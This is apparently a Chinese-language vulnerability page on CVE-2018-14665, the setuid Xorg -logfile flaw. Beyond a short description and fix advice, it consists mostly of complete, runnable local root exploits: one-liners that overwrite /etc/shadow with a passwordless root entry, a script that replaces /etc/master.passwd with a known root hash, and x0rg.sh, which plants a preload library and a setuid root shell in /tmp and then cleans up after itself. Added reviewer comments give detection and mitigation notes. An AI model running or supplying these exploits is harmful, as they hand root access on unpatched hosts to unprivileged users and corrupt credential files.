OpenBSD Xorg 服务提权漏洞可在远程 SSH 会话中触发(CVE-2018-14665)
基本信息
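本地提权(Local Privilege Escalation,LPE):以 setuid root 方式安装的 Xorg 在处理非特权用户传入的 -logfile 参数时缺少权限检查,日志文件因此会以 root 身份写到调用者指定的路径,从而覆盖系统文件。修复方式是安装厂商补丁,或临时去掉 Xorg 的 setuid 位。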
OpenBSD Xorg 服务提权漏洞可在远程 SSH 会话中触发 (CVE-2018-14665)
https://twitter.com/hackerfantastic/status/1055517801224396800
PoC / Exp
关键 payload
# Two published one-line variants of the same file-overwrite primitive.
# Both change into /etc and start Xorg with "-logfile shadow", so the X server
# log is written to /etc/shadow. The -fp (font path) argument is a string in
# /etc/shadow entry format for root with an empty password field; the approach
# relies on that string ending up in the log, and su is run afterwards.
# The first variant pipes the command through sh and adds -quiet and -keeptty
# (presumably what lets it run from an SSH session, per the page title -
# confirm).
# NOTE(review): the shadow-style entry suggests a Linux target rather than
# OpenBSD, which keeps password hashes in master.passwd - confirm.
# Defender notes: the root cause is an Xorg binary that runs with root
# privileges for unprivileged callers and honours -logfile from them; apply
# the vendor fix or remove the setuid bit from Xorg. Detection signals: Xorg
# started by a non-root user with -logfile (or -modulepath) on the command
# line, an unexpected /etc/shadow.old (presumably the rotated original), and
# X server log text inside /etc/shadow.
echo 'cd /etc; Xorg -quiet -fp "root::16431:0:99999:7:::" -keeptty -logfile shadow :1' | sh; su
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# - https://hacker.house
#
# Reviewer notes (defensive reading of what the script does):
#   - It abuses Xorg's -logfile option so that the X server log replaces
#     /etc/master.passwd; the -fp (font path) value is a master.passwd-format
#     line for root carrying a bcrypt hash.
#   - The script's own reminder shows the previous file is left behind as
#     /etc/master.passwd.old, which is both an indicator of compromise and
#     the copy to restore from during recovery.
#   - Detection: Xorg launched by a non-root user with -logfile on the
#     command line, X log text inside /etc/master.passwd, an unexpected
#     /etc/master.passwd.old.
#   - Mitigation: apply the vendor fix, or remove the setuid bit from the
#     Xorg binary until it is available.
echo [+] OpenBSD 6.4 stable local root exploit
# The relative -logfile path used below resolves inside /etc.
cd /etc
# Xorg is started in the background on display :1 with the log redirected to
# master.passwd; the font-path string is the root entry the script wants to
# appear in that file.
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
# Presumably gives the server time to write its log before it is stopped.
sleep 5
pkill Xorg
# The original file survives as master.passwd.old and has to be moved back
# with correct permissions to repair the system.
echo [-] dont forget to mv and chmod /etc/master.passwd.old
# Per this message, 'Password1' is the password matching the hash above.
echo [+] type 'Password1' and hit enter for root
su -
x0rg.sh
https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
#
# Reviewer notes (defensive reading of what the script does):
#   - Instead of a password file, this variant points Xorg's -logfile at
#     /etc/ld.so.preload and passes the path of a shared object in /tmp as
#     the font path, then runs a setuid program (mount) so the dynamic loader
#     pulls that object in with root privileges.
#   - NOTE(review): /etc/ld.so.preload is a glibc loader feature, so this
#     variant appears aimed at Linux hosts rather than OpenBSD - confirm.
#   - The library's constructor deletes /etc/ld.so.preload and the script
#     removes its sources and the library, so what remains on disk is
#     /tmp/rootshell (root-owned, mode 04755). Rely on process and file audit
#     logs rather than on the preload file still being present.
#   - Detection: creation or modification of /etc/ld.so.preload, a setuid
#     root binary appearing under /tmp, a compiler producing a shared object
#     in /tmp, Xorg started by a non-root user with -logfile.
#   - Mitigation: apply the vendor fix or remove the setuid bit from Xorg;
#     mounting /tmp nosuid should additionally stop the setuid bit on
#     /tmp/rootshell from taking effect (hardening, not a fix).
echo "x0rg"
echo "[+] First, we create our shell and library..."
# Source of the shared library. Its constructor runs when the library is
# loaded: it makes /tmp/rootshell root-owned and setuid, then removes
# /etc/ld.so.preload.
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
# Build the library and delete its source file.
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
# Source of the helper binary that sets its uid/gid to 0 and executes /bin/sh.
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
# Build the helper binary and delete its source file.
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Hack the planet!"
# The file-overwrite step: the X server log goes to /etc/ld.so.preload, with
# the library path supplied as the font path.
cd /etc; Xorg -fp "/tmp/libhax.so" -logfile ld.so.preload :1;
mount # arbitrary setuid program, run so the preloaded library executes as root
echo "[+] Tidy up a bit..."
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
# Only artifact left in /tmp at this point: the setuid helper binary.
/tmp/rootshell